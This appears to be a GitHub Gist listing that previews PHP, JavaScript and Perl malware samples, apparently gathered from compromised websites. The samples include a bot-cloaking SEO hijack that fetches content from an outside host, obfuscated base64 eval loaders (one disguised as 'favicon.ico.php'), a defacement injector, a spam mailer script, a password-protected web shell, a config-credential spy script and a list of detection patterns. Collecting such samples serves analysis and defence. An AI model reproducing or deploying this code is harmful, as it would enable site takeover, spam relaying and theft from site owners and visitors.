Palma Solutions LTD PalmaSolutions
PalmaSolutions
/ hijack
Created
September 16, 2017 10:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){ | |
| $ch = curl_init(); | |
| $timeout = 5; | |
| curl_setopt ($ch, CURLOPT_URL, 'http://message.vaultpos.com/2017alllinks02-1.txt'); | |
| curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); | |
| curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); | |
| $file_contents = curl_exec($ch); | |
| curl_close($ch); | |
| echo $file_contents; |
PalmaSolutions
/ unknown-malware15.php
Created
August 11, 2017 15:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(0); | |
| @ini_set('error_log',NULL); | |
| @ini_set('log_errors',0); | |
| @ini_set('display_errors',0); | |
| $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5'; | |
| $pass = "Zgc5c4MXrKk0ZQwD69BWJ/PdPFbQdr9dm2WSGbE="; | |
| if (ini_get('allow_url_fopen')) { | |
| function get_data_ya($url) { | |
| $data = file_get_contents($url); |
PalmaSolutions
/ unknown-malware.js
Created
August 11, 2017 15:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>document.documentElement.innerHTML = unescape('%0d%0a%0d%0a%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%2f%48%61%63%6b%65%64%20%42%79%20%50%73%79%63%6f%20%4d%69%73%74%65%20%26%20%48%61%74%74%61%62%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%3e%0d%0a%3c%62%72%3e%3c%62%72%3e%0d%0a%3c%70%20%61%6c%69%67%6e%3d%22%63%65%6e%74%65%72%22%3e%3c%62%3e%3c%66%6f%6e%74%20%66%61%63%65%3d%22%62%6f%6c%64%22%20%73%69%7a%65%3d%22%38%22%3e%20%50%73%79%63%6f%20%4d%69%73%74%65%20%26%20%48%61%74%74%61%62%20%3c%2f%66%6f%6e%74%3e%3c%63%65%6e%74%65%72%3e%0d%0a%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%0d%0a%3c%70%20%61%6c%69%67%6e%3d%22%63%65 |
PalmaSolutions
/ unknown-malware14.php
Created
August 11, 2017 15:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $ckaszjpfiozxj = stripslashes($_POST['rbfjbbz']); | |
| $gsqsgwkta = stripslashes($_POST['hqmtnfp']); | |
| $mhhpxa = stripslashes($_POST['cmkv']); | |
| $sawdwtr = mail(stripslashes($ckaszjpfiozxj), stripslashes($gsqsgwkta), stripslashes($mhhpxa)); | |
| if($sawdwtr){echo 'wdrtoairr';} else {echo 'blaas : ' . $sawdwtr;} ?> |
PalmaSolutions
/ unknown-malware13.php
Created
August 11, 2017 15:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php function .+? = ''; for($i=0; $i < strlen($o); $i++) .+? .= isset($ .+? ="base64_decode";return $ | |
| my $out = `ldd /usr/bin/host`; | |
| $_SERVER)===TRUE){$ .+? }function error_404(){header( .+? ]}=preg_replace("/( .+? ="/".uniqid().uniqid();${ | |
| echo 'action error'; .+? echo "publish success"; | |
| .chr(48)."KaW".chr(89). | |
| echo $ok ? "SHELL_OK" : "SHELL_BAD"; | |
| if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); | |
| <!DOCTYPE html> <?php eval(base64_decode('.+?));?> | |
| // ProGraMmeD By BaD-BoY [ | |
| DZS Upload |
PalmaSolutions
/ unknown-malware20.php
Created
August 11, 2017 14:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| ${"GL\x4f\x42\x41\x4c\x53"}["\x69\x68\x66\x6b\x76bw\x71\x6fo\x6es"]="t\x79\x70\x65\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75tf\x69h\x61\x73"]="\x6f\x75t";${"\x47\x4cOB\x41\x4cS"}["\x73\x6dp\x62\x67\x6b"]="\x75r\x6c";${"GL\x4f\x42\x41\x4c\x53"}["l\x75\x70f\x6b\x6ep\x70\x75\x67"]="\x73\x6fc\x6be\x74";${"G\x4c\x4f\x42\x41LS"}["\x68\x75\x72\x74\x66\x6f\x6f\x74d\x77\x62"]="\x61\x64dr\x65\x73s";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x79xcw\x64vn\x6c"]="\x75a";${"\x47\x4c\x4f\x42AL\x53"}["\x6bqc\x6f\x6ac\x67s\x71\x63"]="\x72\x65\x73";${"\x47L\x4f\x42A\x4c\x53"}["\x69dwr\x70\x6ewz\x77"]="\x64o\x6d\x61i\x6e";${"\x47LO\x42\x41\x4cS"}["z\x6e\x68k\x70qe\x63"]="\x78";${"GLO\x42\x41\x4cS"}["k\x6fhe\x63\x69j\x70"]="\x64\x65\x66\x61ul\x74\x5f\x70ort";${"\x47\x4c\x4fB\x41L\x53"}["\x73\x7a\x72q\x66\x76\x79\x79"]="\x72\x65s\x75lt";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x64l\x75\x6a\x73\x69o\x69\x73\x68"]="\x73\x69\x74e";@ini_set("disp\x6ca\x79\x5fer\x72\x6frs","\x4f\x66\x66");global$ua;$npmsrlswy="\x73\x69\x74\x65";$ucx |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -w | |
| use strict; | |
| use IO::Socket::INET; | |
| use IO::Socket::SSL; | |
| use Getopt::Long; | |
| use Config; | |
| $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors | |
| print <<EOTEXT; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl | |
| # [!] confspy.pl v1.1 for /home/$user/public_html | |
| # [!] Private Script !!! | |
| # c0li.m0de.0n Begin !!! | |
| # Please check ftp connection before enable it. | |
| # 0=disable, 1=enable | |
| my $ftp_login = 1; |
PalmaSolutions
/ favicon.ico.php
Created
July 27, 2017 19:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) | |
| { | |
| define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1); | |
| $dqvngqtl = 3668; function cahzfuo($rxcvscdxez, $vgbtdue){$ohnusitt = ''; for($i=0; $i < strlen($rxcvscdxez); $i++){$ohnusitt .= isset($vgbtdue[$rxcvscdxez[$i]]) ? $vgbtdue[$rxcvscdxez[$i]] : $rxcvscdxez[$i];} | |
| $xcygvdvew="base" . "64_decode";return $xcygvdvew($ohnusitt);} | |
| $fuuvacow = '1ujObQfh7yINnEGi9bCInvVrnIwF7EnvDbfmGJSR90FObQfh7yINnEGi9bCF7ECN3qVU7ZVeVUAtRbQx1uh2'. | |
| 'TlMhqZOICbtv7lHaqEGa3lOcCpIr7IwiTlcIVUAtRbQx1uh23qVU7ZVNnyGA7ZViTlMv912hm'. | |
| 'Ai9uXOICHwiTlcIqESh7lIi912hmAi91ujObyIy9bHQ3l3h7yGQ9bVu8HfN5JwRW6Qh1uhx1'. |
PalmaSolutions
/ unknown-malware-12.php
Created
July 22, 2017 10:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| @session_start(); | |
| @set_time_limit(0); | |
| //PASSWORD CONFIGURATION | |
| @$pass = $_POST['pass']; | |
| $chk_login = true; | |
| $password = "BA"; |
NewerOlder